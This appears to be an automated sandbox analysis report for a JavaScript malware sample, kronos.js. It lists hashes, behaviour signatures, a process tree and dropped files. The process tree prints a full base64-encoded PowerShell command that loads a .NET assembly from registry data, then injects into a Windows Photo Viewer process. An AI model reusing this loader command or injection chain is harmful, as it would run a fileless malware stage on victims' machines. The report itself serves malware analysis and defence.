Analysis
-
max time kernel
150s -
max time network
113s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-01-2021 11:43
Static task
static1
Behavioral task
behavioral1
Sample
kronos.js
Resource
win7v20201028
General
-
Target
kronos.js
-
Size
2.5MB
-
MD5
bd52c3fcb98700992066743b021876dd
-
SHA1
c711676cf2dadffa73b3bd03de01fc3e6ea4e892
-
SHA256
a0081f88e43338810fe23bd2e1fba8857b45f4378df38fc0c217426468b924fc
-
SHA512
24b6831f75736ba70ba8fd00263391e220c7e7cbf3c0d9ed1bfb24f92384a4694282509864d139950afaa910a2c278371354e61a51348b652419bd9c405d7e3b
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
GetX64BTIT.exepid process 4092 GetX64BTIT.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 api.ipify.org 17 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3772 set thread context of 732 3772 powershell.exe ImagingDevices.exe -
Suspicious behavior: EnumeratesProcesses 6889 IoCs
Processes:
powershell.exeImagingDevices.exepid process 3772 powershell.exe 3772 powershell.exe 3772 powershell.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe 732 ImagingDevices.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3772 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
ImagingDevices.exepid process 732 ImagingDevices.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
wscript.execmd.exepowershell.exeImagingDevices.exedescription pid process target process PID 880 wrote to memory of 804 880 wscript.exe cmd.exe PID 880 wrote to memory of 804 880 wscript.exe cmd.exe PID 804 wrote to memory of 3772 804 cmd.exe powershell.exe PID 804 wrote to memory of 3772 804 cmd.exe powershell.exe PID 804 wrote to memory of 3772 804 cmd.exe powershell.exe PID 3772 wrote to memory of 732 3772 powershell.exe ImagingDevices.exe PID 3772 wrote to memory of 732 3772 powershell.exe ImagingDevices.exe PID 3772 wrote to memory of 732 3772 powershell.exe ImagingDevices.exe PID 3772 wrote to memory of 732 3772 powershell.exe ImagingDevices.exe PID 3772 wrote to memory of 732 3772 powershell.exe ImagingDevices.exe PID 3772 wrote to memory of 732 3772 powershell.exe ImagingDevices.exe PID 3772 wrote to memory of 732 3772 powershell.exe ImagingDevices.exe PID 3772 wrote to memory of 732 3772 powershell.exe ImagingDevices.exe PID 3772 wrote to memory of 732 3772 powershell.exe ImagingDevices.exe PID 3772 wrote to memory of 732 3772 powershell.exe ImagingDevices.exe PID 732 wrote to memory of 4092 732 ImagingDevices.exe GetX64BTIT.exe PID 732 wrote to memory of 4092 732 ImagingDevices.exe GetX64BTIT.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\kronos.js1⤵
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAbwBmAHEAZgBzAGcAZAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "2⤵
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAbwBmAHEAZgBzAGcAZAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"5⤵
- Executes dropped EXE
PID:4092
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
b4cd27f2b37665f51eb9fe685ec1d373
SHA17f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA25691f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e
-
MD5
b4cd27f2b37665f51eb9fe685ec1d373
SHA17f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA25691f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e
-
MD5
a8c080a673eaa56a3250e9eade588aeb
SHA1822eeed497cb3ba4801b7804d49b1b4a1712ca57
SHA25610d3192452e3ab16442cfe16568a9b4b68c303481a2a6d26f1bfd05517737b09
SHA51262321b8668c438e661efdefa7f9cfefb53e313ee01036254b9f222b138e0bb80eeeaad67bf9b8144ffe4b636c3a4b549a2513c1559f78f4806ad49ca037e02ca